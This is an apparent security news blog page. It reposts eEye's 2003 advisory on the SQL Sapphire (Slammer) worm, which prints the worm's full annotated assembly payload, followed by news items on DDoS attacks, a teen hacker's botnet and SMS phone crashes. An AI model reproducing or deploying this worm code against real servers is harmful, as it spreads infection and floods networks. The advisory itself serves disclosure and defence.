 Monday, 27. January 2003
SQL Sapphire Worm Analysis
Forwarded from: "Marc Maiffret" <marc@eeye.com>
SQL Sapphire Worm Analysis
Release Date:
1/25/03
Severity:
High
Systems Affected:
Microsoft SQL Server 2000 pre SP 2
Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm
spreading quickly across various networks around the world.
The worm is spreading using a buffer overflow to exploit a flaw in
Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in
July, 2002 by Next Generation Security Software Ltd. The buffer
overflow exists because of the way SQL improperly handles data sent to
its Microsoft SQL Monitor port. Attackers leveraging this
vulnerability will be executing their code as SYSTEM, since Microsoft
SQL Server 2000 runs with SYSTEM privileges.
The worm works by generating pseudo-random IP addresses to try to
infect with its payload. The worm payload does not contain any
additional malicious content (in the form of backdoors etc.); however,
because of the nature of the worm and the speed at which it attempts
to re-infect systems, it can potentially create a denial-of-service
attack against infected networks.
We have been able to verify that multiple points of connectivity on
the Internet have been bogged down since 9pm Pacific Standard Time.
It should be noted that this worm is not the same as an earlier SQL
worm that used the SA/nopassword SQL vulnerability as its spread
vector. This is a new worm is more devastating as it is taking
advantage of a software-specific flaw rather than a configuration
error. We have already had many reports of smaller networks brought
down due to the flood of data from the Sapphire Worm trying to
re-infect new systems.
Corrective Action
We recommend that people immediately firewall SQL service ports at all
of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port)
to spread itself to a new system; however, it is safe practice to
filter all SQL traffic at all gateways. The following is a list of
SQL server ports: ms-sql-s 1433/tcp #Microsoft-SQL-Server ms-sql-s
1433/udp #Microsoft-SQL-Server ms-sql-m 1434/tcp
#Microsoft-SQL-Monitor ms-sql-m 1434/udp #Microsoft-SQL-Monitor
Once again this worm is taking advantage of a known vulnerability that
has had a patch available for many months. Microsoft has also released
a recent service pack for SQL (Service Pack 3) that includes a fix for
this vulnerability.
Standalone patch:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-039.asp
SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp
Previous SQL Service Pack versions are vulnerable.
Technical Description
The following is a quick run-down of what the worm's payload is doing after
infection:
1. Retrieves the address of GetProcAddress and Loadlibrary from the
IAT in sqlsort.dll. It snags the necessary library base addresses and
function entry points as needed.
2. Calls gettickcount, and uses returned count as a pseudo-random seed
3. Creates a UDP socket
4. Performs a simple pseudo random number generation formula using the
returned gettickcount value to generate an IP Address that will later
be used as the target.
5. Send worm payload in a SQL Server Resolution Service request to the
pseudo random target address, on port 1434 (UDP).
6. Return back to formula and continue generating new pseudo random
addresses.
push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session, after the
overflow the payload buffer
; get's corrupted during program
execution but before the
; payload is executed. .
xor ecx, ecx
mov cl, 18h
FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP ; Check entry point fingerprint for
getprocaddress, if it failes
; fall back to GetProcAddress entry
in another DLL version.
; Undetermined what dll versions
this will succedd on. Due
; to the lack of reliable importing
this may not work across all
; dll versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C
VALID_GP:
call dword ptr [esi] ; GetProcAddress
call eax ; return from GetProcaddress =
GetTickCount entrypoint
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h] ; (socket)
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
push 11h
push 2
push 2
call eax ; socket
push eax
lea eax, [ebp-3Ch] ; sendto
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
mov esi, eax ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch
PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm
Start
In Closing
We have provided brief information here as we are currently working to
understand more of the worm's internal behavior. We will provide
updates as they become available.
This worm has been dubbed the "Sapphire Worm" by eEye due to the fact
that several engineers had to be pulled away from local bars to begin
the investigation/dissection process.
Credit:
Riley Hassell
Related Links:
SQLSecurity.com
http://sqlsecurity.com/
Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/ms02-039.asp
Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com [isn]
09:03 |
permanent link |
mail this
Could Attack on DALnet Spell End for IRC?
For at least a month, distributed denial of service (define), or DDOS, attacks have been crippling DALnet, one of the world's largest Internet Relay Chat (define) networks, bringing it to its knees and raising the possibility that many hosting providers may refuse to host IRC servers at all. [LinuxSecurity.com]
09:01 |
permanent link |
mail this
Thursday, 05. December 2002
I shut radio site, boasts teen hacker
By CHRIS BARTON
A teenage hacker attacked an online chatroom run by The Edge radio station and then turned his attention to TV3's website.
The 15-year-old, who goes by the online name of "deejay-fuzion" and attends Roturua Lakes High School, rang the Herald to brag about his exploits.
Asked why he launched a "DDOS" (distributed denial of service) attack against the chatroom on Monday night, he said: "Because the administrator was ... just being a smart arse."
"Dj-fu" signalled his "bots" to flood the chatroom computer with spurious internet traffic, causing the server to slow down and eventually stop.
During the process he noticed other servers belonging to TV3 were in the same proximity so he tried his attack on TV3's website - "just because I could". (Radioworks, which owns the Edge, and TV3 have the parent company CanWest).
TV3 communications manager Roger Beaumont confirmed The Edge chat server had a DDOS attack and was offline for a short period. But he said it was coincidence that TV3's website was offline on Tuesday for routine maintenance.
Will Steele, a friend of the 15-year-old who was online at the time, said the TV3 site was unavailable during the attack and the "routine maintenance" message appeared on the site after the attack ended at 9.45pm. That was when the hacker was taken offline by his internet provider, Quicksilver.
Its network manager Mark Frater said two individuals were disconnected on Monday night after the internet provider received a complaint from a server administrator.
When contacted by Quicksilver, both denied knowledge of an attack and had their internet accounts reinstated.
Quicksilver manager Trevor Isted said there was no proof to link the pair to the attack. Usage logs were being investigated, and if evidence was found, the pair would be banned from access for breaching the internet provider's acceptable use policy.
The teenager claims to have written a trojan program called "FB3" with a friend known online as "lynx".
The program exploits a "Netbios" vulnerability in Windows PCs related to file and print sharing, to plant itself on unsuspecting users' computers.
The infected computers (bots - short for robots) signal their presence to a computer in the United States which the teenager uses to send out the instructions to attack.
In this case the method of attack was a "SYN flood" - an efficient process which fakes the initial handshake of an internet connection with false addresses which the target Machine is unable to answer.
It keeps retrying to accept them, and with enough of these happening, a server can become overwhelmed.
New anti-hacking provisions - including clauses covering DDOS attacks - in the Crimes Amendment Bill are waiting to be introduced to Parliament.
But the hacker would be immune from prosecution because he is only 15. [moreover Computersecurity]
18:44 |
permanent link |
mail this
Wednesday, 04. December 2002
An Introduction to Distributed Denial of Service Attacks
This article will explain the concept of DDoS attacks, how they work, how to react if you become a target, and how the security community can work together to prevent them. [Help Net Security]
12:38 |
permanent link |
mail this
Friday, 22. November 2002
Brief: T-Mobile installs GPRS network firewall
In a move to head off hacker probes detected earlier this month on its GPRS cellular network, T-Mobile USA Inc. has installed a firewall. [Computerworld]
05:23 |
permanent link |
mail this
Tuesday, 19. November 2002
Glitch Opens T-Mobile User to Hacker Probes
An IT manager at the Associated Press found hacker probes on a PC tied to T-Mobile USA's mobile data network, raising concerns about whether he might be charged for the unwanted traffic. [Computerworld]
06:53 |
permanent link |
mail this
Monday, 04. November 2002
SpamCop Blacklists Declan, Again
Declan McCullagh reports that his Politech server has been blacklisted by SpamCop -- for the third time. Longtime readers may... [Freedom To Tinker]
16:14 |
permanent link |
mail this
Wednesday, 23. October 2002
Hacker attack targets root servers
A powerful denial-of-service attack briefly crippled nine of the 13 Internet
"root" servers, but traffic routing was able to continue unimpeded, said ICANN VP Louis Touton: "As best we can tell, no user noticed and the attack was dealt with and life goes on." One government official described Monday's attack as the most sophisticated and large-scale assault on these root servers to date. The attack, which began around 4:45 p.m. EDT on Monday, blasted the servers with 30 to 40 times the normal amount of messages, rendering seven computers unable to respond to legitimate Internet traffic. Two others failed intermittently during the attack. The Internet theoretically can run with just one operational root server, but response times would be very slow. [AP 23 Oct 2002; NewsScan Daily, 23 October 2002]
http://apnews.excite.com/article/20021023/D7MR8PT00.html
[ via risks-digest Volume 22, Issue 32]
00:00 |
permanent link |
mail this
Friday, 11. October 2002
Scottish ISP in repeat DDoS attack
Edinburgh-based ISP edNET was hit by a distributed denial of service attack, again.
The attack started yesterday morning, and continued throughout the day, continuing until late afternoon today. Residual problems still remain. EdNET's customer status page said that the attack was minor but customers tell us that they have lost service because of the attack. [...] One user writes to tell us that the problem is causing more problems than this message would imply.
"To the best of my knowledge both business and home users have had no Internet access for the best part of 36 hours," he writes.
[...] This
08:38 |
permanent link |
mail this
Wednesday, 23. January 2002
Royal chat session failed
A public chat session was scheduled yesterday between, on one hand, the
Dutch Crown Prince Willem Alexander and his fiancee Maxima Zorreguieta and,
on the other hand 100 selected citizens. The session was made available for
everybody to watch on a Web site.
The server failed after a few minutes and did not come up again, so the rest
of the session was canceled.
According to several news sources (radio and TV news, printed press), KPN,
who provided the server, says that the crash was caused by "sabotage", and
that the site, that was designed for "tens of thousands" of users, received
3 billion (Yes, 3,000,000,000) hits.
The story does not look very plausible to me. To deliver 3,000,000,000 IP
packets, even short ones, in a few minutes takes something like a 10
Gbits/sec connection into the server, and would require quite a powerful
attacking machine with a comparable network connection, or a concerted
attack by tens of thousands of home PC's on modem lines.
I also had a look at
http://internettrafficreport.com
Such a volume of traffic in a short time should cause some slowdown of other
Internet traffic in the networks concerned. I saw no noticeable performance
degradation in any of the Dutch routers monitored by this site, nor anywhere
else, around the time of the event.
Speculation in the media now goes that the site simply received more genuine
hits than it was designed for, but not billions (Holland has 16 million
inhabitants), and could not cope, and that KPN is reluctant to admit their
mis-estimation of the traffic.
Does anybody have more information about what really happened? [Erling Kristiansen <ekristia@xs4all.nl> via risks-digest Volume 21, Issue 89]
00:00 |
permanent link |
mail this
Friday, 07. December 2001
SMS phone crash exploit a risk for older Nokias
SMS phone crash exploit a risk for older Nokias, by John Leyden, 12 Jun 2001
Nokia has upgraded its phone software to guard against a security glitch
that might allow a cracker to render a phone inoperable by sending a text
message. However, older phones may still be vulnerable.
http://www.theregister.co.uk/content/55/23232.html ["monty solomon" <monty@roscom.com> via risks-digest Volume 21, Issue 82]
00:00 |
permanent link |
mail this
Thursday, 29. November 2001
How to crash a phone by SMS
How to crash a phone by SMS
By John Leyden
Posted: 28/11/2001 at 18:20 GMT
So now you can send an SMS and crash a mobile phone, so that the user is
locked out. Job de Haas, a security researcher at ITSX, has adapted a
program called sms_client, which sends an SMS message from an
Internet-connected PC, in which the User Data Header is broken.
During a presentation during the Black Hat conference last week, he
demonstrated how a malformed message crashes a Nokia 6210 phone on its
receipt. Once the message is received it is impossible to turn on an
infected phone again. ...
http://www.theregister.co.uk/content/55/23080.html [Monty Solomon <monty@roscom.com> via risks-digest Volume 21, Issue 80]
00:00 |
permanent link |
mail this
Thursday, 24. May 2001
CERT subjected to "just another attack"
The Web site of the federally funded Computer Emergency Response Team (CERT)
was clogged by a "denial of service" attack that lasted 30 hours this
week. CERT, which is located at Carnegie Mellon University in Pittsburgh,
has a mission of providing warnings about computer attacks and viruses. An
official of the organization said: "We get attacked every day. This is just
another attack. The lesson to be learned here is that no one is immune to
these kinds of attacks. They cause operational problems, and it takes time
to deal with them." [AP/*USA Today*, 24 May 2001; NewsScan Daily, 24 May 2001
http://www.usatoday.com/life/cyber/tech/2001-05-24-cert-hacked.htm] ["NewsScan" <newsscan@newsscan.com> via risks-digest Volume 21, Issue 42]
00:00 |
permanent link |
mail this
Thursday, 29. March 2001
Approved posts to large listservs
I recently sent an email to bugtraq@securityfocus.com, which
was approved after being examined by the moderator.
Here is the risk: Since I made the mistake of using an e-mail address from a
small domain that I manage, my DNS server immediately got killed by the tens
of thousands of mail servers trying to resolve my domain name.(which of
course was not in anyones cache; my domain is pretty much unknown.)
I saw all this traffic and didn't immediately recognize what it was. I was
scared, but a little bit of investigation provided an answer.
After an hour and my cable modem rebooting a few times from the sheer load,
everything seemed to settle down, but I'll tell you, watching the lights on
that modem flash without yet understanding what was happening sure scared
me. [Paul Hessels <timdau@yahoo.com> via risks-digest Volume 21, Issue 32]
00:00 |
permanent link |
mail this
Friday, 26. January 2001
Network vandal attacks Microsoft sites
Just a day after Microsoft's Web sites were down for an extended period of
time because of the "human error" of a technician, they were victimized by
the "human malice" of a network vandal who subjected them to a "denial of
service" attack that flooded them with bogus communications, causing them to
gridlock and reject legitimate communications from their customers. The
company has called in the FBI for assistance. Computer security expert Abe
Singer of the San Diego Supercomputer Center said that part of Microsoft's
vulnerability to attack was due to the fact that its four domain-name
servers are linked in a single network. "They had all their eggs in one
basket and basically someone knocked down the basket." (*The Washington
Post*, 26 Jan 2001; NewsScan Daily, 26 Jan 2001
http://washingtonpost.com/wp-dyn/articles/A47581-2001Jan25.html) ["NewsScan" <newsscan@newsscan.com> via risks-digest Volume 21, Issue 22]
00:00 |
permanent link |
mail this
Wednesday, 03. January 2001
Evil spammers jailed for two years
By: John Leyden
Two Los Angeles men are to go to jail for their part in a bulk email scam which duped 12,000 people and severely impacted upon the operations of several, large US ISPs.
Associated Press reports that Steve Shklovskiy and Yan Shtok both received a sentence of two years and were ordered to pay £69 000 compensation for their role in a September 1999 scheme which involved the sending of 50 million emails. The men pleaded guilty to fraud charges in December 1999, so why it has taken so long for a sentence to be pronounced remains unclear. Two others also involved in the scam were sentenced to probation in July.
The spam messages sent out by the gang invited recipients to send a £24 "processing fee" in order to learn how to get a job stuffing envelopes. We're surprised 12,000 people replied to such an obvious scam - particularly when such jobs are advertised in most every evening newspaper's situation vacant column.
Investigators said Shklovskiy and Shtok worked out a way to use commercial available software to "harvest" email addresses. Under the terms of the plea agreement the men made with the court, which presumably took a year to conclude, they will have to explain the techniques they used to perform the scam.
Internet providers, including AOL, AT&T and Mindspring, were besieged by customer complaints and their systems were threatened by the overload as a result of the sheer scale of the spamming. They also suffered the further indignity of being bombarded with customer complaints [The Register]
00:00 |
permanent link |
mail this
disLEXia, a research project by Maximillian Dornseif
|
